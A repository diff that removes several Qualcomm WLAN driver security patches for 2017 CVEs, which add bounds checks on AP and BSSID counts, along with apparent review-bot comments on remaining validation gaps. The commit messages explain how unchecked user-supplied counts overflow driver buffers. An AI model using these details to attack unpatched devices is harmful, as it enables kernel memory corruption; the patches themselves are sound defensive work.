@@ -1,88 +0,0 @@ -From 10f0051f7b3b9a7635b0762a8cf102f595f7a268 Mon Sep 17 00:00:00 2001 -From: Srinivas Girigowda -Date: Wed, 30 Nov 2016 12:27:44 -0800 -Subject: qcacld-2.0: Avoid overflow of "set_bssid_hotlist" params - -The wlan driver supports the following vendor command: - QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_BSSID_HOTLIST - -This command supplies a "number of APs" attribute as well as a list of -per-AP attributes. However there is no validation that the number of -APs provided won't overflow the destination buffer. In addition there -is no validation that the number of APs actually provided matches the -number of APs expected. - -To address these issues: -* Verify that the expected number of APs doesn't exceed the maximum - allowed number of APs -* Verify that the actual number of APs supplied doesn't exceed the - expected number of APs -* Only process the actual number of supplied APs if it is less than - the expected number of APs. - -Change-Id: I41e36d11bc3e71928866a27afc2fbf046b59f0f5 -CRs-Fixed: 1095770 ---- - CORE/HDD/src/wlan_hdd_cfg80211.c | 16 ++++++++++++++++ - CORE/SERVICES/WMA/wma.c | 4 ++-- - 2 files changed, 18 insertions(+), 2 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c -index d91859f..1991204 100644 ---- a/CORE/HDD/src/wlan_hdd_cfg80211.c -+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c -@@ -2893,6 +2893,11 @@ static int __wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy, - } - pReqMsg->numAp = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_NUM_AP]); -+ if (pReqMsg->numAp > WLAN_EXTSCAN_MAX_HOTLIST_APS) { -+ hddLog(LOGE, FL("Number of AP: %u exceeds max: %u"), -+ pReqMsg->numAp, WLAN_EXTSCAN_MAX_HOTLIST_APS); -+ goto fail; -+ } - hddLog(LOG1, FL("Number of AP %d"), pReqMsg->numAp); - - /* Parse and fetch lost ap sample size */ -@@ -2911,6 +2916,11 @@ static int __wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy, - i = 0; - 
nla_for_each_nested(apTh, - tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM], rem) { -+ if (i == pReqMsg->numAp) { -+ hddLog(LOGW, FL("Ignoring excess AP")); -+ break; -+ } -+ - if (nla_parse(tb2, QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX, - nla_data(apTh), nla_len(apTh), - wlan_hdd_extscan_config_policy)) { -@@ -2949,6 +2959,12 @@ static int __wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy, - i++; - } - -+ if (i < pReqMsg->numAp) { -+ hddLog(LOGW, FL("Number of AP %u less than expected %u"), -+ i, pReqMsg->numAp); -+ pReqMsg->numAp = i; -+ } -+ - context = &pHddCtx->ext_scan_context; - spin_lock(&hdd_context_lock); - INIT_COMPLETION(context->response_event); -diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c -index 2cf66bf..8ab1d2d 100644 ---- a/CORE/SERVICES/WMA/wma.c -+++ b/CORE/SERVICES/WMA/wma.c -@@ -28633,8 +28633,8 @@ VOS_STATUS wma_get_buf_extscan_hotlist_cmd(tp_wma_handle wma_handle, - /* setbssid hotlist expects the bssid list - * to be non zero value - */ -- if (!numap) { -- WMA_LOGE("%s: Invalid number of bssid's", __func__); -+ if ((numap <= 0) || (numap > WLAN_EXTSCAN_MAX_HOTLIST_APS)) { -+ WMA_LOGE("%s: Invalid number of APs: %d", __func__, numap); - return VOS_STATUS_E_INVAL; - } - num_entries = wma_get_hotlist_entries_per_page(wma_handle->wmi_handle, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0441/qcacld-2.0/0001.patch deleted file mode 100644 index 5ec531e3..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-2.0/0001.patch +++ /dev/null 
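Review bot: A zero AP count passes the new HDD check, because `if (pReqMsg->numAp > WLAN_EXTSCAN_MAX_HOTLIST_APS)` rejects only the upper bound, while the wma.c hunk of the same patch treats `numap <= 0` as invalid; the request is therefore built and handed down before it is refused. The same state is reached when the nested list is empty and the post-loop fix-up runs `pReqMsg->numAp = i;` with `i == 0`. Unless a zero count is meant to be accepted at this layer, I would fail early with `if (!pReqMsg->numAp || pReqMsg->numAp > WLAN_EXTSCAN_MAX_HOTLIST_APS)` and add `if (i == 0) goto fail;` after the loop. The qcacld-2.0 "significant change" patch filed under CVE-2017-0441 has the same shape in both its HDD and WMA hunks. Both functions extend beyond the hunks shown, so what the `fail` label releases is not visible here.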
@@ -1,90 +0,0 @@ -From da87131740351b833f17f05dfa859977bc1e7684 Mon Sep 17 00:00:00 2001 -From: Jeff Johnson -Date: Tue, 29 Nov 2016 08:19:13 -0800 -Subject: qcacld-2.0: Avoid overflow of "significant change" params - -The wlan driver supports the following vendor command: - QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SIGNIFICANT_CHANGE - -This command supplies a "number of APs" attribute as well as a list of -per-AP attributes. However there is no validation that the number of -APs provided won't overflow the destination buffer. In addition there -is no validation that the number of APs actually provided matches the -number of APs expected. - -To address these issues: -* Verify that the expected number of APs doesn't exceed the maximum - allowed number of APs -* Verify that the actual number of APs supplied doesn't exceed the - expected number of APs -* Only process the actual number of supplied APs if it is less than - the expected number of APs. - -Change-Id: I0513ffbc4a38f1d7ddbc0815d3618fc9a2ea4f77 -CRs-Fixed: 1095009 ---- - CORE/HDD/src/wlan_hdd_cfg80211.c | 16 ++++++++++++++++ - CORE/SERVICES/WMA/wma.c | 6 +++--- - 2 files changed, 19 insertions(+), 3 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c -index 800d123..d91859f 100644 ---- a/CORE/HDD/src/wlan_hdd_cfg80211.c -+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c -@@ -3342,6 +3342,11 @@ static int __wlan_hdd_cfg80211_extscan_set_significant_change( - } - pReqMsg->numAp = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP]); -+ if (pReqMsg->numAp > WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS) { -+ hddLog(LOGE, FL("Number of AP %u exceeds max %u"), -+ pReqMsg->numAp, WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS); -+ goto fail; -+ } - - pReqMsg->sessionId = pAdapter->sessionId; - hddLog(LOG1, FL("Number of AP %d Session Id %d"), pReqMsg->numAp, -@@ -3350,6 +3355,12 @@ static int __wlan_hdd_cfg80211_extscan_set_significant_change( - i = 0; - 
nla_for_each_nested(apTh, - tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM], rem) { -+ -+ if (i == pReqMsg->numAp) { -+ hddLog(LOGW, FL("Ignoring excess AP")); -+ break; -+ } -+ - if (nla_parse(tb2, - QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX, - nla_data(apTh), nla_len(apTh), -@@ -3389,6 +3400,11 @@ static int __wlan_hdd_cfg80211_extscan_set_significant_change( - - i++; - } -+ if (i < pReqMsg->numAp) { -+ hddLog(LOGW, FL("Number of AP %u less than expected %u"), -+ i, pReqMsg->numAp); -+ pReqMsg->numAp = i; -+ } - - context = &pHddCtx->ext_scan_context; - spin_lock(&hdd_context_lock); -diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c -index 0f803d4..2cf66bf 100644 ---- a/CORE/SERVICES/WMA/wma.c -+++ b/CORE/SERVICES/WMA/wma.c -@@ -28926,9 +28926,9 @@ VOS_STATUS wma_get_buf_extscan_change_monitor_cmd(tp_wma_handle wma_handle, - int numap = psigchange->numAp; - tSirAPThresholdParam *src_ap = psigchange->ap; - -- if (!numap) { -- WMA_LOGE("%s: Invalid number of bssid's", -- __func__); -+ if ((numap <= 0) || (numap > WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS)) { -+ WMA_LOGE("%s: Invalid number of APs: %d", -+ __func__, numap); - return VOS_STATUS_E_INVAL; - } - len += WMI_TLV_HDR_SIZE; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0441/qcacld-3.0/0002.patch deleted file mode 100644 index aca2f6a2..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-3.0/0002.patch +++ /dev/null 
@@ -1,76 +0,0 @@ -From e578706506f98a4962220066d92d81e853ac7212 Mon Sep 17 00:00:00 2001 -From: Jeff Johnson -Date: Tue, 29 Nov 2016 08:54:18 -0800 -Subject: qcacld-3.0: Avoid overflow of "significant change" params - -This is a qcacld-2.0 to qcacld-3.0 propagation. - -The wlan driver supports the following vendor command: - QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SIGNIFICANT_CHANGE - -This command supplies a "number of APs" attribute as well as a list of -per-AP attributes. However there is no validation that the number of -APs provided won't overflow the destination buffer. In addition there -is no validation that the number of APs actually provided matches the -number of APs expected. - -To address these issues: -* Verify that the expected number of APs doesn't exceed the maximum - allowed number of APs -* Verify that the actual number of APs supplied doesn't exceed the - expected number of APs -* Only process the actual number of supplied APs if it is less than - the expected number of APs. 
- -Change-Id: I0513ffbc4a38f1d7ddbc0815d3618fc9a2ea4f77 -CRs-Fixed: 1095009 ---- - core/hdd/src/wlan_hdd_ext_scan.c | 18 ++++++++++++++++++ - 1 file changed, 18 insertions(+) - -diff --git a/core/hdd/src/wlan_hdd_ext_scan.c b/core/hdd/src/wlan_hdd_ext_scan.c -index 86a51f7..320ea3c 100644 ---- a/core/hdd/src/wlan_hdd_ext_scan.c -+++ b/core/hdd/src/wlan_hdd_ext_scan.c -@@ -2320,6 +2320,13 @@ __wlan_hdd_cfg80211_extscan_set_significant_change(struct wiphy *wiphy, - pReqMsg->numAp = - nla_get_u32(tb - [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP]); -+ if (pReqMsg->numAp > WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS) { -+ hdd_err("Number of AP %u exceeds max %u", -+ pReqMsg->numAp, -+ WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS); -+ goto fail; -+ } -+ - pReqMsg->sessionId = pAdapter->sessionId; - hdd_notice("Number of AP %d Session Id %d", - pReqMsg->numAp, pReqMsg->sessionId); -@@ -2328,6 +2335,12 @@ __wlan_hdd_cfg80211_extscan_set_significant_change(struct wiphy *wiphy, - nla_for_each_nested(apTh, - tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM], - rem) { -+ -+ if (i == pReqMsg->numAp) { -+ hdd_warn("Ignoring excess AP"); -+ break; -+ } -+ - if (nla_parse - (tb2, QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX, - nla_data(apTh), nla_len(apTh), -@@ -2372,6 +2385,11 @@ __wlan_hdd_cfg80211_extscan_set_significant_change(struct wiphy *wiphy, - - i++; - } -+ if (i < pReqMsg->numAp) { -+ hdd_warn("Number of AP %u less than expected %u", -+ i, pReqMsg->numAp); -+ pReqMsg->numAp = i; -+ } - - context = &ext_scan_context; - spin_lock(&context->context_lock); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0442/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0442/qcacld-2.0/0001.patch deleted file mode 100644 index 3e7bc3db..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0442/qcacld-2.0/0001.patch +++ /dev/null 
@@ -1,128 +0,0 @@ -From 1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 Mon Sep 17 00:00:00 2001 -From: Jeff Johnson -Date: Mon, 28 Nov 2016 09:19:02 -0800 -Subject: qcacld-2.0: Avoid overflow of roam subcmd params - -Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor -command, for the following roam commands there are input validation -issues: - QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS - QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID - -Both of these commands have a "number of BSSIDs" attribute as well as a -list of BSSIDs. However there is no validation that the number of -BSSIDs provided won't overflow the destination buffer. In addition -there is no validation that the number of BSSIDs actually provided -matches the number of BSSIDs expected. - -To address these issues, for the above mentioned commands: -* Verify that the expected number of BSSIDs doesn't exceed the maximum - allowed number of BSSIDs -* Verify that the actual number of BSSIDs supplied doesn't exceed the - expected number of BSSIDs -* Only process the actual number of supplied BSSIDs if it is less than - the expected number of BSSIDs. 
- -Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6 -CRs-Fixed: 1092497 ---- - CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------ - 1 file changed, 37 insertions(+), 6 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c -index b3c265c..800d123 100644 ---- a/CORE/HDD/src/wlan_hdd_cfg80211.c -+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c -@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1]; - int rem, i; - uint32_t buf_len = 0; -+ uint32_t count; - int ret; - - if (VOS_FTM_MODE == hdd_get_conparam()) { -@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - hddLog(LOGE, FL("attr num of preferred bssid failed")); - goto fail; - } -- roam_params.num_bssid_favored = nla_get_u32( -+ count = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]); -+ if (count > MAX_BSSID_FAVORED) { -+ hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"), -+ count, MAX_BSSID_FAVORED); -+ goto fail; -+ } - hddLog(VOS_TRACE_LEVEL_DEBUG, -- FL("Num of Preferred BSSID (%d)"), -- roam_params.num_bssid_favored); -+ FL("Num of Preferred BSSID: %d"), count); - i = 0; - nla_for_each_nested(curr_attr, - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS], - rem) { -+ -+ if (i == count) { -+ hddLog(LOGW, FL("Ignoring excess Preferred BSSID")); -+ break; -+ } -+ - if (nla_parse(tb2, - QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX, - nla_data(curr_attr), nla_len(curr_attr), -@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - roam_params.bssid_favored_factor[i]); - i++; - } -+ if (i < count) -+ hddLog(LOGW, -+ FL("Num Preferred BSSID %u less than expected %u"), -+ i, count); -+ roam_params.num_bssid_favored = i; - sme_update_roam_params(pHddCtx->hHal, session_id, - roam_params, REASON_ROAM_SET_FAVORED_BSSID); - break; -@@ -2092,15 +2108,25 @@ 
__wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - hddLog(LOGE, FL("attr num of blacklist bssid failed")); - goto fail; - } -- roam_params.num_bssid_avoid_list = nla_get_u32( -+ count = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]); -+ if (count > MAX_BSSID_AVOID_LIST) { -+ hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"), -+ count, MAX_BSSID_AVOID_LIST); -+ goto fail; -+ } - hddLog(VOS_TRACE_LEVEL_DEBUG, -- FL("Num of blacklist BSSID (%d)"), -- roam_params.num_bssid_avoid_list); -+ FL("Num of blacklist BSSID: %d"), count); - i = 0; - nla_for_each_nested(curr_attr, - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS], - rem) { -+ -+ if (i == count) { -+ hddLog(LOGW, FL("Ignoring excess Blacklist BSSID")); -+ break; -+ } -+ - if (nla_parse(tb2, - QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX, - nla_data(curr_attr), nla_len(curr_attr), -@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - roam_params.bssid_avoid_list[i])); - i++; - } -+ if (i < count) -+ hddLog(LOGW, -+ FL("Num Blacklist BSSID %u less than expected %u"), -+ i, count); -+ roam_params.num_bssid_avoid_list = i; - sme_update_roam_params(pHddCtx->hHal, session_id, - roam_params, REASON_ROAM_SET_BLACKLIST_BSSID); - break; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0443/qcacld-2.0/0001.patch deleted file mode 100644 index c157c6d2..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-2.0/0001.patch +++ /dev/null 
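Review bot: The unbraced `if (i < count)` added after each loop has a three-line `hddLog(...)` call as its body and is followed directly by the unconditional `roam_params.num_bssid_favored = i;` (and `roam_params.num_bssid_avoid_list = i;` in the blacklist case), which is easy to misread or to break in a later edit; I would brace both, `if (i < count) {` … `}`. `count` is declared `uint32_t` but is logged with `%d` in `FL("Num of Preferred BSSID: %d")` and `FL("Num of blacklist BSSID: %d")`, so those should be `%u`, and `i` is an `int` compared against the unsigned `count` in `if (i == count)`, which would read more clearly with matching types. The identical qcacld-2.0 patch filed under CVE-2017-0443 and its qcacld-3.0 propagation carry the same code. __wlan_hdd_cfg80211_set_ext_roam_params starts and ends outside these hunks.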
@@ -1,128 +0,0 @@ -From f1081e78eff75ca665c662493736b17cb792b46d Mon Sep 17 00:00:00 2001 -From: Jeff Johnson -Date: Mon, 28 Nov 2016 09:19:02 -0800 -Subject: qcacld-2.0: Avoid overflow of roam subcmd params - -Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor -command, for the following roam commands there are input validation -issues: - QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS - QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID - -Both of these commands have a "number of BSSIDs" attribute as well as a -list of BSSIDs. However there is no validation that the number of -BSSIDs provided won't overflow the destination buffer. In addition -there is no validation that the number of BSSIDs actually provided -matches the number of BSSIDs expected. - -To address these issues, for the above mentioned commands: -* Verify that the expected number of BSSIDs doesn't exceed the maximum - allowed number of BSSIDs -* Verify that the actual number of BSSIDs supplied doesn't exceed the - expected number of BSSIDs -* Only process the actual number of supplied BSSIDs if it is less than - the expected number of BSSIDs. 
- -Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6 -CRs-Fixed: 1092497 ---- - CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------ - 1 file changed, 37 insertions(+), 6 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c -index b3c265c..800d123 100644 ---- a/CORE/HDD/src/wlan_hdd_cfg80211.c -+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c -@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1]; - int rem, i; - uint32_t buf_len = 0; -+ uint32_t count; - int ret; - - if (VOS_FTM_MODE == hdd_get_conparam()) { -@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - hddLog(LOGE, FL("attr num of preferred bssid failed")); - goto fail; - } -- roam_params.num_bssid_favored = nla_get_u32( -+ count = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]); -+ if (count > MAX_BSSID_FAVORED) { -+ hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"), -+ count, MAX_BSSID_FAVORED); -+ goto fail; -+ } - hddLog(VOS_TRACE_LEVEL_DEBUG, -- FL("Num of Preferred BSSID (%d)"), -- roam_params.num_bssid_favored); -+ FL("Num of Preferred BSSID: %d"), count); - i = 0; - nla_for_each_nested(curr_attr, - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS], - rem) { -+ -+ if (i == count) { -+ hddLog(LOGW, FL("Ignoring excess Preferred BSSID")); -+ break; -+ } -+ - if (nla_parse(tb2, - QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX, - nla_data(curr_attr), nla_len(curr_attr), -@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - roam_params.bssid_favored_factor[i]); - i++; - } -+ if (i < count) -+ hddLog(LOGW, -+ FL("Num Preferred BSSID %u less than expected %u"), -+ i, count); -+ roam_params.num_bssid_favored = i; - sme_update_roam_params(pHddCtx->hHal, session_id, - roam_params, REASON_ROAM_SET_FAVORED_BSSID); - break; -@@ -2092,15 +2108,25 @@ 
__wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - hddLog(LOGE, FL("attr num of blacklist bssid failed")); - goto fail; - } -- roam_params.num_bssid_avoid_list = nla_get_u32( -+ count = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]); -+ if (count > MAX_BSSID_AVOID_LIST) { -+ hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"), -+ count, MAX_BSSID_AVOID_LIST); -+ goto fail; -+ } - hddLog(VOS_TRACE_LEVEL_DEBUG, -- FL("Num of blacklist BSSID (%d)"), -- roam_params.num_bssid_avoid_list); -+ FL("Num of blacklist BSSID: %d"), count); - i = 0; - nla_for_each_nested(curr_attr, - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS], - rem) { -+ -+ if (i == count) { -+ hddLog(LOGW, FL("Ignoring excess Blacklist BSSID")); -+ break; -+ } -+ - if (nla_parse(tb2, - QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX, - nla_data(curr_attr), nla_len(curr_attr), -@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - roam_params.bssid_avoid_list[i])); - i++; - } -+ if (i < count) -+ hddLog(LOGW, -+ FL("Num Blacklist BSSID %u less than expected %u"), -+ i, count); -+ roam_params.num_bssid_avoid_list = i; - sme_update_roam_params(pHddCtx->hHal, session_id, - roam_params, REASON_ROAM_SET_BLACKLIST_BSSID); - break; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0443/qcacld-3.0/0002.patch deleted file mode 100644 index 21823da6..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-3.0/0002.patch +++ /dev/null 
@@ -1,126 +0,0 @@ -From a4c5eefd5dd761445784963f3b6605d24d2bc3af Mon Sep 17 00:00:00 2001 -From: Jeff Johnson -Date: Tue, 29 Nov 2016 07:22:08 -0800 -Subject: qcacld-3.0: Avoid overflow of roam subcmd params - -This is a qcacld-2.0 to qcacld-3.0 propagation. - -Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor -command, for the following roam commands there are input validation -issues: - QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS - QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID - -Both of these commands have a "number of BSSIDs" attribute as well as a -list of BSSIDs. However there is no validation that the number of -BSSIDs provided won't overflow the destination buffer. In addition -there is no validation that the number of BSSIDs actually provided -matches the number of BSSIDs expected. - -To address these issues, for the above mentioned commands: -* Verify that the expected number of BSSIDs doesn't exceed the maximum - allowed number of BSSIDs -* Verify that the actual number of BSSIDs supplied doesn't exceed the - expected number of BSSIDs -* Only process the actual number of supplied BSSIDs if it is less than - the expected number of BSSIDs. 
- -Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6 -CRs-Fixed: 1092497 ---- - core/hdd/src/wlan_hdd_cfg80211.c | 41 ++++++++++++++++++++++++++++++++++------ - 1 file changed, 35 insertions(+), 6 deletions(-) - -diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c -index 169629a..c457140 100644 ---- a/core/hdd/src/wlan_hdd_cfg80211.c -+++ b/core/hdd/src/wlan_hdd_cfg80211.c -@@ -2339,6 +2339,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1]; - int rem, i; - uint32_t buf_len = 0; -+ uint32_t count; - int ret; - - ENTER_DEV(dev); -@@ -2509,14 +2510,24 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - hdd_err("attr num of preferred bssid failed"); - goto fail; - } -- roam_params.num_bssid_favored = nla_get_u32( -+ count = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]); -- hdd_debug("Num of Preferred BSSID (%d)", -- roam_params.num_bssid_favored); -+ if (count > MAX_BSSID_FAVORED) { -+ hdd_err("Preferred BSSID count %u exceeds max %u", -+ count, MAX_BSSID_FAVORED); -+ goto fail; -+ } -+ hdd_debug("Num of Preferred BSSID (%d)", count); - i = 0; - nla_for_each_nested(curr_attr, - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS], - rem) { -+ -+ if (i == count) { -+ hdd_warn("Ignoring excess Preferred BSSID"); -+ break; -+ } -+ - if (nla_parse(tb2, - QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX, - nla_data(curr_attr), nla_len(curr_attr), -@@ -2545,6 +2556,10 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - roam_params.bssid_favored_factor[i]); - i++; - } -+ if (i < count) -+ hdd_warn("Num Preferred BSSID %u less than expected %u", -+ i, count); -+ roam_params.num_bssid_favored = i; - sme_update_roam_params(pHddCtx->hHal, session_id, - roam_params, REASON_ROAM_SET_FAVORED_BSSID); - break; -@@ -2554,14 +2569,24 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - hdd_err("attr num of 
blacklist bssid failed"); - goto fail; - } -- roam_params.num_bssid_avoid_list = nla_get_u32( -+ count = nla_get_u32( - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]); -- hdd_debug("Num of blacklist BSSID (%d)", -- roam_params.num_bssid_avoid_list); -+ if (count > MAX_BSSID_AVOID_LIST) { -+ hdd_err("Blacklist BSSID count %u exceeds max %u", -+ count, MAX_BSSID_AVOID_LIST); -+ goto fail; -+ } -+ hdd_debug("Num of blacklist BSSID (%d)", count); - i = 0; - nla_for_each_nested(curr_attr, - tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS], - rem) { -+ -+ if (i == count) { -+ hdd_warn("Ignoring excess Blacklist BSSID"); -+ break; -+ } -+ - if (nla_parse(tb2, - QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX, - nla_data(curr_attr), nla_len(curr_attr), -@@ -2582,6 +2607,10 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy, - roam_params.bssid_avoid_list[i].bytes)); - i++; - } -+ if (i < count) -+ hdd_warn("Num Blacklist BSSID %u less than expected %u", -+ i, count); -+ roam_params.num_bssid_avoid_list = i; - sme_update_roam_params(pHddCtx->hHal, session_id, - roam_params, REASON_ROAM_SET_BLACKLIST_BSSID); - break; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0444/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0444/ANY/0001.patch deleted file mode 100644 index 699a7985..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0444/ANY/0001.patch +++ /dev/null 
@@ -1,60 +0,0 @@
-From 230f280dd4046a227665ff07c9afaa7b9aa1e061 Mon Sep 17 00:00:00 2001
-From: Mark Salyzyn
-Date: Thu, 17 Nov 2016 08:58:07 -0800
-Subject: rt5677: protect model_buf and model_len
-
-vad_lock is active for model_buf and model_len fields
-except during RT_WRITE_CODEC_DSP_IOCTL transactions.
-
-Signed-off-by: Mark Salyzyn
-Bug: 32705232
-Change-Id: I3493909019b18a902c577c0010b41087fecb5325
----
- sound/soc/codecs/rt5677.h | 1 +
- sound/soc/codecs/rt5677_ioctl.c | 10 ++++++++--
- 2 files changed, 9 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/codecs/rt5677.h b/sound/soc/codecs/rt5677.h
-index 5295cfd..2375769 100644
---- a/sound/soc/codecs/rt5677.h
-+++ b/sound/soc/codecs/rt5677.h
-@@ -1468,6 +1468,7 @@ struct rt5677_priv {
- */
- struct regmap *regmap;
- struct mutex index_lock;
-+ /* protects vad activities, including model_len and model_buf */
- struct mutex vad_lock;
- struct workqueue_struct *check_mic_wq;
